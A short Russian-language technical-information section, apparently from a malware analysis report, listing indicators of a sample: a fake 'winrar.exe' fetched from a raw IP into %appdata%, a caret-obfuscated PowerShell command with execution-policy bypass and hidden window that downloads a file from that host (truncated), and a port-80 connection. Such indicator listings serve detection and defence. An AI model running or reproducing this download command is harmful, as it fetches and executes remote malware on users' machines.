Техническая информация
- http://107.189.52.174/winrar.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^O^w^erSHEl^l.^ExE^ ^-E^xEc^U^TIoNpOli^cy^ ^BY^P^Ass -NOPr^o^FI^LE -wi^ndoWs^TyLe h^I^D^d^en (n^eW^-ObJE^cT^ S^YStE^M.N^Et.^w^Eb^C^lI^e^nT^)^.dOW^n^L^oadFIlE('http://107.189...
- '10#.#89.52.174':80
- '<SYSTEM32>\cmd.exe' /C "P^O^w^erSHEl^l.^ExE^ ^-E^xEc^U^TIoNpOli^cy^ ^BY^P^Ass -NOPr^o^FI^LE -wi^ndoWs^TyLe h^I^D^d^en (n^eW^-ObJE^cT^ S^YStE^M.N^Et.^w^Eb^C^lI^e^nT^)^.dOW^n^L^oadFIlE('http://107.189...' (со скрытым окном)